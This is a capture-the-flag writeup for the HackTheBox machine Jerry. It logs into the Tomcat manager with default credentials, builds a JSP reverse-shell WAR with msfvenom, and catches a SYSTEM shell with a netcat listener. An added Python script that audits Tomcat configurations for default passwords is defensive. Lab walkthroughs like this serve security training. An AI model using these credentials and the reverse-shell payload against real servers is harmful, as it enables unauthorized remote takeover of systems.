Today we will take a look at HackTheBox: Jerry. My goal in sharing this writeup is to show you the way if you are stuck. Please try to understand each step and take notes.

  • Network scan
└─# nmap -Pn -p- -sCV --open -oN nmap/open
STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1

Looking at port 8080, we see Apache Tomcat. We go to the /manager path and enter the default username and password.

Username: tomcat

Password: s3cret
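From the defender's side, the login above works because a manager account in tomcat-users.xml still carries a default password. The following is an added example, not part of the original writeup: a small audit that flags such accounts. The sample file contents, the password deny-list, and the function name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample of a tomcat-users.xml; only tomcat/s3cret comes from this page.
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="deploy" roles="manager-script"/>
  <user username="ops" password="Vq7#pT2m!xLe9zRw" roles="manager-status"/>
  <user username="viewer" password="tomcat" roles="reports"/>
</tomcat-users>
"""

# Assumption: a short deny-list; extend it with your own organisation's list.
KNOWN_DEFAULT_PASSWORDS = {"s3cret", "tomcat", "admin", "password", "changeit", ""}
# Tomcat's built-in roles that grant control of the Manager / Host Manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}


def audit_tomcat_users(xml_text):
    """Return (username, privileged_roles, reason) for each risky account."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        # Tomcat 8+ files carry an XML namespace; strip it before comparing.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if not privileged:
            continue  # weak password, but no manager/admin access
        if password.lower() in KNOWN_DEFAULT_PASSWORDS:
            reason = "known default password"
        elif password.lower() == name.lower():
            reason = "password equals username"
        else:
            continue
        findings.append((name, privileged, reason))
    return findings


if __name__ == "__main__":
    for user, roles, reason in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"[!] {user}: {reason}; roles={','.join(roles)}")
```

The check compares plaintext values only, so it does not apply to entries stored as digests.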

Here we get a reverse shell.

  • System
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=9999 -f war -o rshell.war
Payload size: 1103 bytes
Final size of war file: 1103 bytes
Saved as: rshell.war

Now let’s upload it.

Let’s start a listener and run it.

Just click on /rshell.

└─# nc -nvlp 9999                                     
listening on [any] 9999 ...
connect to [] from (UNKNOWN) [] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\apache-tomcat-7.0.88
06/19/2018 04:07 AM <DIR> .
06/19/2018 04:07 AM <DIR> ..
06/19/2018 04:06 AM <DIR> bin
06/19/2018 06:47 AM <DIR> conf
06/19/2018 04:06 AM <DIR> lib
05/07/2018 02:16 PM 57,896 LICENSE
07/26/2022 04:47 PM <DIR> logs
05/07/2018 02:16 PM 1,275 NOTICE
05/07/2018 02:16 PM 9,600 RELEASE-NOTES
05/07/2018 02:16 PM 17,454 RUNNING.txt
06/19/2018 04:06 AM <DIR> temp
07/26/2022 04:53 PM <DIR> webapps
06/19/2018 04:34 AM <DIR> work
4 File(s) 86,225 bytes
9 Dir(s) 2,408,210,432 bytes free
nt authority\system

And now we are SYSTEM.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”



Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.